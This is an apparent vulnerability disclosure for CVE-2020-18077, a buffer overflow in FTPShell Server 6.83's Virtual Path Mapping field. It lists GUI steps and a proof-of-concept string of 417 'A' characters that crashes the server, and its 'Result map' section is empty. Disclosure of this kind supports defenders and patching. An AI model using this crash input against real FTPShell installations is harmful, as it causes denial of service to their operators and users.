Headline
CVE-2020-18077: vul/FTPShell_Server_6.83_DOS.md at master · cve-vul/vul
A buffer overflow vulnerability in the Virtual Path Mapping component of FTPShell v6.83 allows attackers to cause a denial of service (DoS).
Permalink
Cannot retrieve contributors at this time
FTPShell Server 6.83 – Denial of Service
Discoverer: leiothrix
Discovery time: 2019/4/27
Tested Version: 6.83
Software Link: http://www.ftpshell.com/downloadserver.htm
Steps to exploit:
1.Open FTPShell Server
2.Select "Manage FTP Accounts"
3.Select "Configure accounts..."
4.Select "Add path" and in "Virtual Path Mapping" Paste Clipboard
5.Input POC 417*A
6.Click on "OK"
POC:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Result map: